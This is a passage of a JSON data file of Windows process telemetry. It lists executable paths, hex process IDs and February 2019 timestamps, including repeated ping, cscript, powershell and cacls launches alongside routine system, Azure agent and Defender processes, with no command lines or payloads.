12:49:08.373000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x239c2019-02-10 12:49:09.170000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x17702019-02-10 12:49:26.303000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xfc02019-02-10 12:49:26.333000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0x7f82019-02-10 12:49:43.463000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x18602019-02-10 12:49:43.483000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x1dec2019-02-10 12:50:00.633000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xb002019-02-10 12:50:00.660000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xeb02019-02-10 12:50:17.820000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x158c2019-02-10 12:50:17.833000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0x7942019-02-10 12:50:35.010000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x4582019-02-10 12:50:35.033000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x1b002019-02-10 12:50:52.190000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xb282019-02-10 12:50:52.227000\",\"c:\\\\windows\\\\system32\\\\rundll32.exe0x6342019-02-10 12:51:09.383000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x16a82019-02-10 12:51:09.400000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x1e682019-02-10 12:51:26.553000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xa982019-02-10 12:51:27.350000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x14c82019-02-10 12:51:44.527000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x6c02019-02-10 12:51:44.540000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0x22c02019-02-10 12:52:01.710000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x22802019-02-10 12:52:01.737000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0xccc2019-02-10 12:52:18.887000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x67c2019-02-10 12:52:18.950000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x8782019-02-10 12:52:38.103000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x13d82019-02-10 12:52:38.123000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0x14582019-02-10 12:53:00.327000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xa242019-02-10 12:53:00.350000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x1cd82019-02-10 12:53:16.500000\",\"c:\\\\windows\\\\system32\\\\taskhostw.exe0x14202019-02-10 12:59:59.870000\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe0x8f82019-02-10 13:28:02.253000\",\"c:\\\\windows\\\\system32\\\\usoclient.exe0xc5c2019-02-10 13:55:20.800000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x1f882019-02-10 13:55:20.813000\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe0x1cd82019-02-10 14:28:02.247000\",\"c:\\\\windows\\\\system32\\\\wermgr.exe0x19d82019-02-09 22:55:10.333000\",\"c:\\\\windows\\\\system32\\\\wermgr.exe0x1e3c2019-02-10 15:07:12.880000\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe0x1a9c2019-02-10 15:28:02.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17702019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x12602019-02-10 15:44:47.267000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x55c2019-02-10 15:44:47.450000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x115c2019-02-10 15:44:47.467000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x20682019-02-10 15:44:47.483000\",\"c:\\\\windows\\\\system32\\\\reg.exe0x11dc2019-02-10 15:45:07.637000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x13e42019-02-10 15:45:07.653000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0x15242019-02-10 15:45:27.887000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x17b02019-02-10 15:45:27.907000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x8c42019-02-10 15:45:57.147000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x22282019-02-10 15:45:58.020000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x1cf02019-02-10 15:46:22.260000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x18602019-02-10 15:46:22.287000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0x18742019-02-10 15:46:44.473000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xa902019-02-10 15:46:44.503000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x11a82019-02-10 15:47:06.720000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x173c2019-02-10 15:47:06.750000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x19102019-02-10 15:47:31.987000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x1db42019-02-10 15:47:32.003000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0x4382019-02-10 15:47:45.133000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x20182019-02-10 15:47:45.153000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x21c82019-02-10 15:47:49.197000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x20442019-02-10 15:47:49.223000\",\"c:\\\\windows\\\\system32\\\\rundll32.exe0x22002019-02-10 15:47:49.237000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x11242019-02-10 15:47:49.253000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0xd442019-02-10 15:48:03.363000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1c242019-02-10 15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11982019-02-10 15:48:04.297000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x135c2019-02-10 15:48:04.310000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xd042019-02-10 15:48:04.323000\",\"c:\\\\windows\\\\system32\\\\reg.exe0x23642019-02-10 15:48:18.437000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x11102019-02-10 15:48:18.460000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0x9942019-02-10 15:48:32.593000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x23282019-02-10 15:48:32.613000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x6d42019-02-10 15:48:46.753000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x20e42019-02-10 15:48:47.493000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x19982019-02-10 15:49:01.577000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xf542019-02-10 15:49:01.603000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0x5a82019-02-10 15:49:15.733000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x1db82019-02-10 15:49:15.750000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x1fa42019-02-10 15:49:29.877000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x6042019-02-10 15:49:29.903000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x1f242019-02-10 15:49:44.043000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x5182019-02-10 15:49:44.060000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0x21702019-02-10 15:49:58.200000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x12a82019-02-10 15:49:58.227000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x200c2019-02-10 15:50:12.367000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xf802019-02-10 15:50:12.397000\",\"c:\\\\windows\\\\system32\\\\rundll32.exe0x18602019-02-10 15:50:26.530000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x18742019-02-10 15:50:26.550000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0xccc2019-02-10 15:50:40.703000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xd7c2019-02-10 15:50:56.413000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x16342019-02-10 15:51:10.573000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x17482019-02-10 15:51:10.590000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0x18982019-02-10 15:51:24.723000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x1eb42019-02-10 15:51:24.747000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x14682019-02-10 15:51:38.890000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x22002019-02-10 15:51:38.953000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x1e8c2019-02-10 15:51:39.990000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x23482019-02-10 15:51:40.003000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0x11f02019-02-10 15:51:41.033000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x1f202019-02-10 15:51:41.053000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x14802019-02-10 15:51:49.140000\",\"c:\\\\windows\\\\system32\\\\services.exe0x2201970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\sppsvc.exe0x9802019-02-09 23:13:35.000000\",\"c:\\\\windows\\\\system32\\\\sppsvc.exe0x17042019-02-10 00:14:24.307000\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiapsrv.exe0x15202019-02-10 00:45:29.713000\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiapsrv.exe0x16cc2019-02-10 00:45:32.377000\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiapsrv.exe0xfd42019-02-10 00:48:31.607000\",\"c:\\\\windows\\\\system32\\\\sppsvc.exe0x53c2019-02-10 01:15:12.267000\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe0xbbc2019-02-10 01:28:44.710000\",\"c:\\\\windows\\\\system32\\\\sppsvc.exe0x23e82019-02-10 02:16:01.357000\",\"c:\\\\windows\\\\system32\\\\sppsvc.exe0xdf82019-02-10 03:16:49.923000\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe0x1c502019-02-09 20:28:56.763000\",\"c:\\\\windows\\\\system32\\\\sppsvc.exe0x3942019-02-10 04:08:34.507000\",\"c:\\\\windows\\\\system32\\\\sppsvc.exe0x105c2019-02-10 04:17:37.363000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xd442019-02-10 05:10:54.303000\",\"c:\\\\windows\\\\system32\\\\sppsvc.exe0x9942019-02-10 05:18:26.020000\",\"c:\\\\windows\\\\system32\\\\sppsvc.exe0x17e02019-02-10 06:19:15.163000\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe0xa582019-02-10 06:28:59.927000\",\"c:\\\\windows\\\\system32\\\\sppsvc.exe0x15642019-02-10 08:20:53.497000\",\"c:\\\\windows\\\\system32\\\\sppsvc.exe0x13282019-02-10 09:21:42.017000\",\"c:\\\\windows\\\\system32\\\\sppsvc.exe0x1e3c2019-02-09 22:12:35.813000\",\"c:\\\\windows\\\\system32\\\\sppsvc.exe0x1fa82019-02-10 10:22:30.100000\",\"c:\\\\windows\\\\system32\\\\sppsvc.exe0x12d42019-02-10 11:23:18.200000\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe0x1f382019-02-10 11:28:16.790000\",\"c:\\\\windows\\\\system32\\\\sppsvc.exe0x239c2019-02-10 12:24:06.663000\",\"c:\\\\windows\\\\system32\\\\sppsvc.exe0x23202019-02-10 13:24:54.133000\",\"c:\\\\windows\\\\system32\\\\sppsvc.exe0x1f3c2019-02-10 14:25:42.670000\",\"c:\\\\windows\\\\system32\\\\sppsvc.exe0x11f02019-02-10 15:26:31.390000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0x8641970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0x8dc2019-02-09 21:02:56.257000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x183c2019-02-09 21:02:56.273000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe0xd742019-02-09 23:22:56.257000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x21c82019-02-09 23:22:56.267000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0x6f82019-02-09 23:32:56.260000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x1c242019-02-09 23:32:56.280000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0x1fc02019-02-10 00:02:56.257000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x17a42019-02-10 00:02:56.270000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe0x10bc2019-02-10 00:12:56.253000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x1c102019-02-10 00:12:56.263000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0xb482019-02-10 00:32:56.270000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x235c2019-02-10 00:32:56.287000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0xbd02019-02-09 21:32:56.270000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x14682019-02-09 21:32:56.290000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0x15c82019-02-09 20:32:56.260000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x12782019-02-09 20:32:56.280000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0xe342019-02-09 22:02:56.263000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0xbc2019-02-09 22:02:56.277000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe0x53c2019-02-09 22:32:56.247000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x18342019-02-09 22:32:56.260000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0xef42019-02-09 22:32:56.260000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x15f42019-02-09 22:32:56.273000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe0xcd82019-02-09 20:52:56.260000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0xfd42019-02-09 20:52:56.270000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe0x181c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xbc2019-02-09 21:09:24.310000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x1b282019-02-09 21:09:24.320000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1d6c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x15f42019-02-09 22:01:13.703000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xda82019-02-09 22:01:13.727000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x16e02019-02-09 22:01:30.850000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xbb42019-02-09 22:01:30.870000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0x11f42019-02-09 22:01:48.043000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x12d02019-02-09 22:01:48.070000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0xce02019-02-09 22:02:05.223000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe0x19941970-01-01 00:00:00.000000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe0x123c2019-02-09 23:16:28.153000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x20b02019-02-09 23:16:28.163000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xccc2019-02-09 23:20:15.547000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x14ec2019-02-09 23:20:15.560000\",\"c:\\\\windowsazure\\\\secagent\\\\wasecagentprov.exe0xda82019-02-09 23:55:46.057000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x1cfc2019-02-09 23:55:46.063000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe0x7fc2019-02-10 00:22:33.813000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x108c2019-02-10 00:22:33.823000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x7982019-02-10 00:26:22.213000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x22e02019-02-10 00:26:22.227000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe0x172c2019-02-10 01:27:25.173000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x1dec2019-02-10 01:27:25.197000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe2c2019-02-10 01:31:14.010000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x10802019-02-10 01:31:14.020000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe0xb142019-02-10 02:31:30.377000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x17ec2019-02-10 02:31:30.387000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x18982019-02-10 02:35:21.217000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x10582019-02-10 02:35:21.230000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe0xe1c2019-02-10 03:35:37.273000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x8342019-02-10 03:35:37.283000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17c42019-02-10 03:39:26.323000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x88c2019-02-10 03:39:26.337000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe0x2e42019-02-10 04:39:41.880000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x108c2019-02-10 04:39:41.890000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13602019-02-10 04:43:32.697000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x19f42019-02-10 04:43:32.710000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe0x19f02019-02-10 05:43:48.783000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x15702019-02-10 05:43:48.793000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17a82019-02-10 05:47:40.657000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x10582019-02-10 05:47:40.667000\",\"c:\\\\windowsazure\\\\secagent\\\\wasecagentprov.exe0x82c2019-02-10 05:55:52.110000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0xd442019-02-10 05:55:52.123000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe0x1bfc2019-02-10 06:47:56.813000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x19982019-02-10 06:47:56.830000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1c102019-02-10 06:51:50.063000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x11842019-02-10 06:51:50.073000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe0xc6c2019-02-10 07:52:06.713000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x4542019-02-10 07:52:06.727000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x65c2019-02-10 07:56:00.233000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0xe1c2019-02-10 07:56:00.247000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe0x10702019-02-10 08:56:16.593000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x1ce82019-02-10 08:56:16.607000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xb102019-02-10 09:00:10.517000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x22602019-02-10 09:00:10.533000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe0x1c542019-02-09 22:11:59.877000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x181c2019-02-09 22:11:59.890000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x8c02019-02-09 22:16:24.523000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x1f602019-02-09 22:16:24.537000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe0x123c2019-02-10 10:00:27.043000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x5182019-02-10 10:00:27.057000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xc982019-02-10 10:04:18.733000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x1cdc2019-02-10 10:04:18.747000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe0x14842019-02-10 11:04:35.127000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0xb142019-02-10 11:04:35.140000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x16bc2019-02-10 11:08:29.550000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x1bb42019-02-10 11:08:29.573000\",\"c:\\\\windowsazure\\\\secagent\\\\wasecagentprov.exe0x1be42019-02-10 11:55:57.567000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0xec42019-02-10 11:55:57.577000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe0xd682019-02-10 12:08:46.173000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0xb642019-02-10 12:08:46.183000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1eb42019-02-10 12:12:35.877000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0xc982019-02-10 12:12:35.887000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe0x6f82019-02-10 13:12:52.733000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x84c2019-02-10 13:12:52.743000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1d6c2019-02-10 13:16:43.013000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x4902019-02-10 13:16:43.027000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe0x16d42019-02-10 14:16:59.427000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0xa2c2019-02-10 14:16:59.437000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x65c2019-02-10 14:20:50.820000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x12fc2019-02-10 14:20:50.830000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe0xd782019-02-10 15:21:06.890000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x221c2019-02-10 15:21:06.907000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12382019-02-10 15:24:56.040000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x15842019-02-10 15:24:56.050000\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\msmpeng.exe0x7c81970-01-01 00:00:00.000000\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe0x14202019-02-09 22:54:40.460000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x20e42019-02-09 22:54:40.467000\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe0x9ac2019-02-09 22:54:40.497000\",\"c:\\\\windows\\\\servic~2\\\\networ~1\\\\appdata\\\\local\\\\temp\\\\mpam-d3ea18d4.exe0x10782019-02-09 22:55:15.427000\",\"c:\\\\windows\\\\servic~2\\\\networ~1\\\\appdata\\\\local\\\\temp\\\\90875aaa-9256-468e-a6b3-041d325c6594\\\\mpsigstub.exe0x1ea82019-02-09 22:55:23.273000\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe0x1a442019-02-09 22:54:40.470000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x15b82019-02-09 22:54:40.523000\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe0x1da82019-02-09 22:54:40.560000\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe0x99c2019-02-09 22:54:40.520000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x9742019-02-09 22:54:40.527000\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe0x22802019-02-09 22:55:10.993000\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe0x205c2019-02-09 22:55:12.353000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x13602019-02-09 22:55:12.623000\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe0x11d42019-02-09 22:55:12.807000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xaec1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiadap.exe0x1cc42019-02-10 00:46:29.117000\",\"c:\\\\windows\\\\system32\\\\wermgr.exe0x220c2019-02-10 03:06:53.157000\",\"c:\\\\windows\\\\system32\\\\wuauclt.exe0xc142019-02-09 22:55:06.653000\",\"c:\\\\windows\\\\softwaredistribution\\\\download\\\\install\\\\am_delta.exe0x1f242019-02-09 22:55:07.023000\",\"c:\\\\windows\\\\system32\\\\mpsigstub.exe0x1b742019-02-09 22:55:07.220000\",\"c:\\\\windows\\\\system32\\\\wermgr.exe0x16202019-02-09 22:55:15.453000\"],\"source_index\":[\"1000\",\"0\",\"100\",\"102\",\"109\",\"122\",\"131\",\"133\",\"141\",\"170\",\"173\",\"174\",\"177\",\"180\",\"182\",\"179\",\"181\",\"183\",\"184\",\"185\",\"186\",\"187\",\"192\",\"193\",\"194\",\"195\",\"196\",\"197\",\"206\",\"207\",\"231\",\"232\",\"302\",\"303\",\"304\",\"305\",\"316\",\"317\",\"341\",\"342\",\"347\",\"348\",\"351\",\"352\",\"353\",\"354\",\"357\",\"358\",\"361\",\"362\",\"370\",\"371\",\"372\",\"373\",\"378\",\"379\",\"380\",\"381\",\"417\",\"418\",\"442\",\"443\",\"488\",\"489\",\"495\",\"496\",\"506\",\"507\",\"508\",\"509\",\"510\",\"511\",\"515\",\"516\",\"522\",\"523\",\"524\",\"525\",\"528\",\"529\",\"533\",\"534\",\"541\",\"542\",\"575\",\"576\",\"600\",\"601\",\"631\",\"632\",\"633\",\"634\",\"636\",\"637\",\"638\",\"639\",\"644\",\"646\",\"645\",\"647\",\"651\",\"652\",\"653\",\"654\",\"659\",\"660\",\"665\",\"666\",\"679\",\"680\",\"725\",\"726\",\"754\",\"755\",\"760\",\"761\",\"765\",\"766\",\"767\",\"768\",\"769\",\"770\",\"775\",\"776\",\"781\",\"782\",\"783\",\"784\",\"786\",\"787\",\"795\",\"796\",\"799\",\"800\",\"826\",\"828\",\"853\",\"854\",\"891\",\"893\",\"892\",\"894\",\"900\",\"901\",\"902\",\"903\",\"906\",\"907\",\"908\",\"909\",\"917\",\"918\",\"919\",\"920\",\"921\",\"922\",\"924\",\"925\",\"942\",\"944\",\"943\",\"945\",\"171\",\"172\",\"175\",\"178\",\"188\",\"189\",\"191\",\"340\",\"360\",\"369\",\"383\",\"498\",\"518\",\"536\",\"649\",\"662\",\"668\",\"7\",\"71\",\"73\",\"763\",\"778\",\"798\",\"80\",\"898\",\"915\",\"931\",\"1001\",\"1\",\"2\",\"1002\",\"110\",\"111\",\"112\",\"113\",\"114\",\"115\",\"116\",\"117\",\"118\",\"119\",\"